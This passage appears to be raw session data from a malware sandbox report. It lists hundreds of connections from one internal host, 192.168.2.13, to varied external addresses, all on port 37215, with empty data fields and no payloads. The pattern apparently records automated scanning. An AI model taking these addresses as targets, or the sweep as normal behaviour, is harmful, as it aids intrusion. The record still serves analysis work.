                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11872192.168.2.1336224157.16.167.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11873192.168.2.1355124197.113.129.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11874192.168.2.136093641.228.174.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11875192.168.2.134793041.87.73.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11876192.168.2.1353822197.213.168.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11877192.168.2.1337450178.60.61.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11878192.168.2.1348090157.206.44.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11879192.168.2.1350362197.145.52.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11880192.168.2.1358426138.198.225.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11881192.168.2.133774641.57.236.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11882192.168.2.1355464197.64.193.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11883192.168.2.134893234.166.219.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11884192.168.2.133791841.22.51.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11885192.168.2.1354408197.99.29.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11886192.168.2.133355241.25.147.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11887192.168.2.1347950197.185.61.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11888192.168.2.133825671.235.39.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11889192.168.2.134977841.7.149.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11890192.168.2.133924841.111.183.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11891192.168.2.1345092157.161.56.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11892192.168.2.133703241.145.179.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11893192.168.2.1352492197.192.192.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11894192.168.2.135463841.14.182.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11895192.168.2.135652841.185.100.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11896192.168.2.1355256157.126.46.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11897192.168.2.135174241.142.13.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11898192.168.2.134634292.159.240.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11899192.168.2.1342276190.74.6.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11900192.168.2.135417041.62.63.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11901192.168.2.133747241.44.253.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11902192.168.2.1335626197.22.57.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11903192.168.2.134869041.111.32.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11904192.168.2.135169241.166.137.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11905192.168.2.1343292100.228.46.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11906192.168.2.1347080197.139.116.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11907192.168.2.135521241.103.197.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11908192.168.2.135195841.73.185.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11909192.168.2.1349406197.180.22.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11910192.168.2.1360692157.66.24.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11911192.168.2.1349810197.91.168.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11912192.168.2.1340514157.92.181.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11913192.168.2.1354392157.78.233.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11914192.168.2.1334502157.48.152.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11915192.168.2.134757041.132.186.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11916192.168.2.134423683.244.239.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11917192.168.2.1336778197.5.224.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11918192.168.2.1341112157.30.147.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11919192.168.2.134526841.68.154.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11920192.168.2.1353474157.45.90.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11921192.168.2.1351750197.83.90.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11922192.168.2.1354210203.53.176.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11923192.168.2.1352926111.137.64.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11924192.168.2.134435641.140.196.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11925192.168.2.133808841.118.150.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11926192.168.2.1341170157.210.169.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11927192.168.2.1352952197.197.70.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11928192.168.2.135900841.213.106.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11929192.168.2.1354482197.40.174.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11930192.168.2.1340046157.133.172.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11931192.168.2.1360080182.187.6.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11932192.168.2.1343964197.45.36.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11933192.168.2.135360641.132.238.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11934192.168.2.1348584180.230.7.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11935192.168.2.1355154197.134.19.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11936192.168.2.1340644157.19.108.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11937192.168.2.134561241.248.19.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11938192.168.2.135583041.27.63.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11939192.168.2.135435841.168.51.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11940192.168.2.135887041.161.114.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11941192.168.2.1359206157.131.58.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11942192.168.2.134995041.15.100.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11943192.168.2.1358620149.101.162.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11944192.168.2.1336624157.238.221.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11945192.168.2.1349580157.110.132.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11946192.168.2.1358544197.224.95.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11947192.168.2.1342236157.7.164.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11948192.168.2.1346812197.182.241.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11949192.168.2.135966241.160.188.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11950192.168.2.134206268.39.238.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11951192.168.2.133316041.130.123.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11952192.168.2.135070841.114.159.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11953192.168.2.1348138197.21.208.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11954192.168.2.1348794157.30.72.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11955192.168.2.1342420157.151.27.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11956192.168.2.1358916157.27.210.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11957192.168.2.135177441.54.58.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11958192.168.2.1357736197.95.246.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11959192.168.2.1360446136.71.250.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11960192.168.2.1345664197.184.131.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11961192.168.2.1338746124.248.91.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11962192.168.2.1345262197.169.235.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11963192.168.2.1355314157.65.60.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11964192.168.2.1350308197.80.178.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11965192.168.2.1343790197.173.214.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11966192.168.2.1354342108.75.148.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11967192.168.2.1336750197.68.194.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11968192.168.2.135756041.243.27.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11969192.168.2.134388641.124.36.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11970192.168.2.1343652197.113.216.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11971192.168.2.1341966197.64.222.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11972192.168.2.1335714157.38.14.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11973192.168.2.1350604197.64.224.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11974192.168.2.1343564197.31.71.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11975192.168.2.135014859.90.80.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11976192.168.2.135699658.246.103.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11977192.168.2.1357940197.215.136.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11978192.168.2.1343292157.198.94.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11979192.168.2.1343138157.107.49.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11980192.168.2.1342720197.179.104.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11981192.168.2.133507687.65.118.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11982192.168.2.1346536157.28.117.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11983192.168.2.1350790197.198.120.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11984192.168.2.1349796157.139.71.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11985192.168.2.133528241.87.254.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11986192.168.2.134177441.220.180.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11987192.168.2.1345346197.170.148.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11988192.168.2.1353938197.27.111.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11989192.168.2.1344804103.95.71.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11990192.168.2.1355622157.249.233.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11991192.168.2.1345460157.150.128.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11992192.168.2.135419841.28.81.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11993192.168.2.135656441.156.122.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11994192.168.2.135026841.62.222.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11995192.168.2.134079441.78.94.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11996192.168.2.134108241.60.184.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11997192.168.2.1336982141.148.51.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11998192.168.2.133974649.228.188.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11999192.168.2.1334684197.163.37.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12000192.168.2.1334032197.111.4.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12001192.168.2.1343530158.95.161.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12002192.168.2.134403041.172.75.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12003192.168.2.1338112103.220.136.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12004192.168.2.1342344157.51.189.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12005192.168.2.134034841.254.167.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12006192.168.2.133757041.57.41.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12007192.168.2.1341458157.104.49.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12008192.168.2.1343958145.80.188.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12009192.168.2.133774441.103.110.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12010192.168.2.1339890157.156.175.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12011192.168.2.1345236103.48.36.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12012192.168.2.134889653.27.74.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12013192.168.2.1345812178.181.219.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12014192.168.2.1339478157.182.183.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12015192.168.2.1356490157.205.68.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12016192.168.2.1335070157.231.75.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12017192.168.2.1345838167.154.243.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12018192.168.2.133284675.221.76.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12019192.168.2.1343098157.205.29.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12020192.168.2.1342248197.86.144.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12021192.168.2.133563886.93.100.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12022192.168.2.1343700157.186.204.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12023192.168.2.133975041.247.13.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12024192.168.2.135836041.123.141.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12025192.168.2.133313641.145.60.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12026192.168.2.1356330157.205.97.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12027192.168.2.134814241.82.102.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12028192.168.2.1334878157.139.82.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12029192.168.2.1339426157.110.69.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12030192.168.2.1343610115.92.67.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12031192.168.2.1341104197.213.46.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12032192.168.2.1348804197.61.117.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12033192.168.2.1333286157.177.54.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12034192.168.2.1356216203.240.124.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12035192.168.2.133337041.176.130.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12036192.168.2.1336248197.5.210.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12037192.168.2.1355292157.20.72.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12038192.168.2.1336960197.81.206.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12039192.168.2.1340964157.159.237.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12040192.168.2.1360998197.32.138.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12041192.168.2.134387041.12.173.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12042192.168.2.135977043.84.243.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12043192.168.2.1345570197.72.164.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12044192.168.2.1342400197.5.29.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12045192.168.2.1351148197.126.54.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12046192.168.2.134849041.235.194.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12047192.168.2.135021241.2.122.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12048192.168.2.1351036157.158.14.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12049192.168.2.1337054197.128.143.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12050192.168.2.133813241.140.170.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12051192.168.2.1345748157.6.214.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12052192.168.2.1341342157.76.177.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12053192.168.2.1347426197.121.30.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12054192.168.2.134577241.36.53.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12055192.168.2.134605841.118.129.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12056192.168.2.134159041.178.6.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12057192.168.2.133573213.151.188.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12058192.168.2.133492241.22.46.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12059192.168.2.1353564197.190.209.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12060192.168.2.133321441.169.20.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12061192.168.2.134356841.108.124.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12062192.168.2.135798041.125.17.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12063192.168.2.1352718111.234.34.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12064192.168.2.1343232157.116.92.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12065192.168.2.135935441.25.163.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12066192.168.2.1356604157.160.21.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12067192.168.2.1342510157.43.164.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12068192.168.2.1356686174.203.204.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12069192.168.2.1360006157.152.22.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12070192.168.2.1351202157.57.78.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12071192.168.2.1352668197.172.52.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12072192.168.2.135542841.79.208.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12073192.168.2.1359870197.138.201.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12074192.168.2.134300466.201.134.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12075192.168.2.1358708157.51.212.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12076192.168.2.134938041.39.210.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12077192.168.2.1355268157.158.25.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12078192.168.2.1351646109.56.96.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12079192.168.2.1343230157.181.198.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12080192.168.2.135917241.82.161.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
